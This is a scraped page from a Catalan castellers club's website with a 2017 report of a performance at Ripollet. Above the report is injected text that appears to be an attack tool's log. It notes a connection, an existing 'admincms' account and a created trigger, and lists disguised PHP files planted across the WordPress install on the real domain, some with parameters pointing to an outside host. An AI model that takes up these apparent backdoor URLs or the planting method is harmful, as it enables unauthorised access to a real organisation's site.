Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?stream https://castellersdeberga.cat/wp-admin/includes/class-wp-site-health-auto-updates-stream-private-meta-ajax-response-core-cron-stream.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/network/sites-ajax-response-stream-wp.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/user/profile-stream-ajax-ajax-response.php https://castellersdeberga.cat/wp-content/plugins/revslider/index-ajax-response-private-meta-meta-wp-cron-wp-ajax-cron-wp-stream-meta.php https://castellersdeberga.cat/wp-content/plugins/woo-redsys-gateway-light/woocommerce-redsys-core.php https://castellersdeberga.cat/wp-includes/class-wp-hook-private-core-meta-private.php https://castellersdeberga.cat/wp-includes/ms-site-core-wp.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Actuació a Ripollet
 

Actuació a Ripollet


Actuació a RipolletDissabte 26 d’agost de 2017 vam actuar a la Festa Major de Ripollet. Era la primera vegada que actuàvem en aquesta població del Vallès Occidental. Ho vam fer acompanyats dels nostres padrins, els Castellers de Sabadell.
A la Rambla Sant Esteve, vam començar l’actuació aixecant dos pilars de dol per les víctimes dels atemptats de fa 10 dies. La diada castellera a Ripollet començava a la mateixa hora que la manifestació a Barcelona. Per la nostra part, vam descarregar el 3 de 6, 2 de 6 i 3 de 6 amb agulla, tancant amb un altre pilar de 4. Mica en mica, anem recuperant gent de vacances i esperem anar a més les properes setmanes. Els Castellers de Sabadell també han tornat de vacances fa pocs dies. Van descarregar 4 de 8, 2 de 7 i 3 de 8. La setmana vinent tenen l’actuació de la seva Festa Major i esperem que ho puguin alçar un pis.
Dissabte 2 de setembre, actuem a la Festa Major d’Artés, amb els Picapolls de la Gavarresa (la colla local) i els Matossers de Molins de Rei.